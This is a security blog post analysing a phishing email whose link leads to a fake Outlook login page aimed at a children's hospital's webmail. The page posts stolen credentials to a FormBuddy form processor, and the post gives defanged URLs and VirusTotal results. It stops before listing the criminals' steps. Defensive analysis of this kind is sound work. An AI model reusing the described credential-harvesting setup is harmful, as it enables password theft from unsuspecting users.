Phishing For Passwords via FormBuddy.com

Most InfoSec professionals have heard of “layer 8” as the unofficial layer of the OSI Model. For those of you that don’t know Layer 8 refers to people. Meaning, no matter how good your security posture there is always that very predictably unpredictable and unpatchable vulnerability known as the user. It is often easier to exploit a person through social engineering than it is to find another attack vector. Take for example this spam email received by some unsuspecting end users:

The email message above looks very basic. It appears to be coming from a reliable source. The subject is “Document” and there is only one sentence in the body, “I sent a document to you, to view it click on the document below.”

For many users this would seem like a normal work email. Even if they didn’t think it was normal they might not assume it’s malicious or a phishing email.

Below you can see the URL when hovering over the “Document” text:

Clicking on that link redirects the user to the following webpage:

Scanning that URL (hxxps://dk-media.s3.amazonaws[.]com/media/1npoq/downloads/311511/share.html) via VirusTotal shows a detection ratio of 4/68 (as of 8/18/16) for “malicious” and “phishing” site. The link to that VirusTotal report can be found HERE.

Below is a snapshot of the source code showing a URL for hxxp://www.formbuddy[.]com/cgi-bin/form.pl, a method of “POST”, input values for “username” (rifart45f is the account name on FormBuddy.com), as well as a URL pointing to what appears to be a legitimate sub-domain (webmail.luriechildrens[.]org):

Using some fake credentials I attempted to “Sign In” and was redirected to the URL shown in the source code (hxxp://www.formbuddy[.]com/cgi-bin/form.pl). Again, this was a Web login page for an Outlook account.

The phishing site would appear to be targeting the legitimate web portal located at “hxxps://webmail.luriechildrens.org”. Luriechildrens.org is a site for the Ann & Robert H. Lurie Children’s Hospital in Chicago.

Scanning hxxp://www.formbuddy[.]com/cgi-bin/form.pl via VirusTotal shows a detection ratio of 3/68 for “malicious” and “phishing” site (as of 8/18/16). The link to that VirusTotal report can be found HERE.

Predictably I was able to capture my fake credentials via POST request being sent in the clear:

Trying to submit another set of credentials on hxxp://www.formbuddy[.]com/cgi-bin/form.pl doesn’t seem to do anything. I’m not finding any POST request or GET request and clicking the Sign In button doesn’t even return an error with my fake credentials.

Doing some research I found that hackers use FormBuddy as a means to steal victims passwords. Essentially FormBuddy allows anyone to have a remotely hosted form processor for their website. Here are the steps criminals use to steal passwords from their victims: